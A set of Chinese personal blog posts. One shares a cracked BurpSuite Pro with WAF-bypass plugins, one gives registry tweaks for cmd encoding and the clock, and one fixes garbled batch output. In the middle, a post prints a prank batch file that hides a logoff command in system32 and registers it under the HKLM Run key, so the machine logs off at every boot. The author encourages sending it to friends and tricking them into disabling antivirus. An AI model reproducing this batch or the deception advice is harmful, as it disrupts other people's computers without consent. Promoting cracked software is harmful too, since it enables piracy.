我来博客除草了，上一篇博文都是去年12月的了，因为从去年9月开始就上班，期间还有其他的杂七杂八的事情....编不下去了，就是懒！大写的懒！哈哈哈，生活就是如此，你得到一些的同时就会失去一些，吾等凡人逃不过类似这样的定律，只能在此基础上尽可能的活得好一点，仅此而已，朋友加油！
今天是来分享一下渗透测试中人人熟知(如果你不知道，就不是这类人?)的BurpSuite——以下介绍来自维基百科：
Burp 或 Burp Suite（饱嗝套装）是一个用于测试 Web 应用程序安全性的图形化工具。该工具使用Java编写，由PortSwigger Web Security开发。该工具有三个版本。可以免费下载的社区版、专业版和试用后可以购买的企业版。社区版大大减少了功能。它是为Web应用程序安全检查提供全面解决方案而开发的。除了代理服务器、Scanner 和Intruder等基本功能外，该工具还包含更高级的选项，如Spider、Repeater、Decoder、Comparer、Extender和Sequencer。PortSwigger由Web安全领域的领先专家Dafydd Stuttard于2004年创建。[凑字数结束-_-]
    今天分享的是BurpSuite Pro破解版(BurpSuite Cracked version)v1.7.37,其实也可以用于2.0版本的破解，详细的使用破解教程可以参考这里：BurpSuite 1.7.32 Cracked 破解版[注册机]下载【无后门版】，不过前阵子在先知上有朋友发了一个汉化的教程，但是需要手动输入这些命令而且还容易出错，故，我在此基础上写了个一键自动生成桌面快捷方式加上汉化启动。先上图各位看看效果：

说一下包里的几个插件：



burp-vulners-scanner-1.2.jar --- burp 根据Vulners.com提供的漏洞库扫描通过burp的请求是否存在漏洞 

地址：https://github.com/vulnersCom/burp-vulners-scanner

bypasswaf.jar 就如其名bypass 一些waf

地址：https://www.codewatch.org/blog/?p=408

chunked-coding-converter.0.2.1.jar 国人c0ny1最新版 burp分块输出，也是对抗waf的插件

地址：https://github.com/c0ny1/chunked-coding-converter

sqlmap.jar 联合本地sqlmap 进行注入测试，当然burp插件商店上还有一款 sqli-py(地址：https://github.com/portswigger/sqli-py)可以直接安装就不叙述了

所有插件以及脚本下载地址：https://github.com/Mr-xn/BurpSuite-collections

当然了，以上的这些我的这个项目也都有搜集，如果你有好的burp插件或者相关文章都可以push过来，大家一起力量才是最大。

有能力请购买正版！

致敬所有开源的项目作者！

注意：禁止使用本项目所有软件及其文章等资源进行非法测试！

【实用reg文件分享】设置cmd为utf-8&在此处打开CMD&让 Windows 时钟显示精确到秒

在实际使用中，我们经常需要使用cmd处理一些小东西，比如解密脚本啊等：cmd默认的编码方式不支持utf-8的，会乱码：



这时候如果我们使用命令：chcp 65001 即可让cmd命令行支持utf-8的编码格式，就不会乱码了：



在我解决这个问题之前，Google了好久，结果是有很多文章看得我是云里雾里。。。不知所云。最后还是找到了一些零散的信息，最终通过实践验证，加上Google查资料，于是就自己写了个注册表文件导入后就可以安心食用了。下载文件我放在最后，代码也会贴出来。

还有另外两个注册表文件，一个是【在此处打开CMD】另一个是【让 Windows 时钟显示精确到“秒”】。

【在此处打开CMD】 主要是方便我们直接在某个文件夹直接打开cmd并且不用去cd切换路径。效果如下：



【让 Windows 时钟显示精确到“秒”】顾名思义：让Windows的时钟显示秒数。效果如下：

下面就是代码：

Windows Registry Editor Version 5.00

;# -*- coding: utf-8 -*-
;# @Author: Mrxn
;# @Blog: https://mrxn.net/
;# @DateTime: 2018-10-30 20:25:51 Tuesday
;# @Description: this is the default description for Mrxn
;#
;
; 下载【cmd-utf-8_seconds.zip】
;【解压！】【解压！】【解压！】重要的事说三遍！
; 解压后，进入 【cmd-utf-8_seconds】文件夹，双击 【设置cmd为utf-8.reg】弹出的对话框按次序选择 【是】【是】【确定】即可。
; 打开你的cmd.exe 输入 chcp 回车 看到如下类似的信息就表明成功了，以后每次打开cmd就都支持utf-8编码了
; Active code page: 65001
; C:\WINDOWS\system32>chcp
; Active code page: 65001
; C:\WINDOWS\system32>
; 注意：作者在Windows10 1803 中测试没问题。

;第一个是设置chcp 65001(十六进制),but,貌似没用啥作用
[HKEY_CURRENT_USER\Console\%SystemRoot%_system32_cmd.exe]
"CodePage"=dword:0000fde9
"FaceName"="Lucida Console"

;真正起作用的
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]
"autorun"="chcp 65001"

;设置字体的,不喜欢的可以删除或者是修改成自己喜欢的字体(前提是你的电脑里面有这个字体)
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont]
"936"="*Lucida Console"

;小伙砸，看你骨骼精奇，都看到这里了没来我博客逛逛啊 --->https://mrxn.net<

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\Directory\shell\OpenCmdHere]
@="在此处打开命令提示符"
"Icon"="cmd.exe"

[HKEY_CLASSES_ROOT\Directory\shell\OpenCmdHere\command]
@="cmd.exe /s /k pushd "%V""

[HKEY_CLASSES_ROOT\Directory\Background\shell\OpenCmdHere]
@="在此处打开命令窗口"
"Icon"="cmd.exe"

[HKEY_CLASSES_ROOT\Directory\Background\shell\OpenCmdHere\command]
@="cmd.exe /s /k pushd \"%V\""

[HKEY_CLASSES_ROOT\Drive\shell\OpenCmdHere]
@="在此处打开命令窗口"
"Icon"="cmd.exe"

[HKEY_CLASSES_ROOT\Drive\shell\OpenCmdHere\command]
@="cmd.exe /s /k pushd \"%V\""

[HKEY_CLASSES_ROOT\LibraryFolder\background\shell\OpenCmdHere]
@="在此处打开命令窗口"
"Icon"="cmd.exe"

[HKEY_CLASSES_ROOT\LibraryFolder\background\shell\OpenCmdHere\command]
@="cmd.exe /s /k pushd \"%V\""

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSecondsInSystemClock"=dword:00000001

[HKEY_CURRENT_USER\Control Panel\International]
"sLongDate"="yyyy '年' M '月' d '日' dddd"
"sShortDate"="yyyy '年' M '月' d '日' dddd"
"sTimeFormat"="HH:mm:ss"
"sShortTime"="HH:mm:ss"
"sYearMonth"="yyyy '年' M '月'"

附件下载：cmd-utf-8_seconds.7z

PS:这周就会更新 kms脚本和宝塔面板开启域名SSL登录脚本，感谢发邮件反馈bug的朋友。

今天打开虚拟机的xp系统准备crack某个软件的时候发现桌面上的一个noopen.bat，不假思索就打开了。。。心里想，虚拟机嘛，怕个毛。。双击后，没啥特别反应，就是个DOS提示框拒绝访问，但是重启机器后就一直关机重启0.0看来那个批处理生效了啊。。。

下面把代码贴出来：这是从网上看到的一个很简单的批处理：

@echo off
echo shutdown -l -t 0 >C:\WINDOWS\system32\system.bat
attrib C:\WINDOWS\system32\system.bat +s +h
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system /t REG_SZ /d C:\WINDOWS\system32\system.bat /f

怎么破呢，当然是F8进入安全模式了，找到自启的注册表键值，删掉就OK了：

从图上可以看出来，自启注册表键值system 对应的批处理位置，删掉就OK、话说这些都是在没杀毒软件的情况下，有杀毒软件或者是安装了还原软件之类的就不好使了。。。仅此作为饭后的笑谈或许都没意思。。。。

注：不信的自己在虚拟玩吧  你也可以发给你的朋友玩玩。但估计会被杀软干掉的。。。你可以欺骗他先关掉杀软的！嘿嘿 0.0 玩玩就好。

今天我使用绿色单文件版的酷狗音乐的时候，需要使用批处理来显示桌面图标，但是我打开后出现乱码。。。。。。于是就开始和度娘聊天了。。。。。。

首先搜到的方法是：修改注册表：修改codepage的值改为十进制的936或者十六进制的3a8 但是我系统是windows8.1 的 并没有神马codepage ！

于是 Ctrl+F 搜索 codepage 结果这玩意儿。。。

果断放弃这种修改注册表的方法！

第二种方法是：直接在DOS命令框修改 点运行中的 CMD.EXE 窗口或批处理  然后点击窗口左上角，出现菜单，选“默认值”一看，“属性”中的“当前代码页”框框里写着这么一行：“437 (OEM - 美国)”，将“当前代码页”设置为“936 (ANSI/OEM - 简体中文 GBK)”，点“确定”。再打开批处理，OK了！：

第三种方法是：直接修改批处理文件，找到批处理文件，右键---编辑---用记事本打开，在其第一行添加 这样的带代码：chcp 936  

小说明一下：
十六进制"000003a8"或十进制"936"，表示“936 (ANSI/OEM - 简体中文 GBK)”。
十六进制"000001b5"或十进制"437"，表示“437 (OEM - 美国)”。

未加之前：

添加之后：

再次运行，就显示中文了！如图：

这种方法也是博主认为最为有效且便捷的方法。

最后一种方法：

因为面出现这种情况是编码不同导致，所以在最开始就应该把编码修正，支持中文的编码是ANSI。我们第一步是新建一个txt文件。

然后点击新建的文本文档，然后选择“文件”=》“另存为”

cmd中的编码方式为ANSI，若中文不是此编码方式则会出现乱码。所以我们在编码的时候选择“ANSI”

然后把批处理里面的内容复制过来，粘贴到新建的这个文本里面，再次打开也就显示正常了。

好了，今天就小记到这里吧。希望对遇到这种情况的朋友有所帮助。
      每天一点点，记录自己的成长中的那些琐事。。。。。。。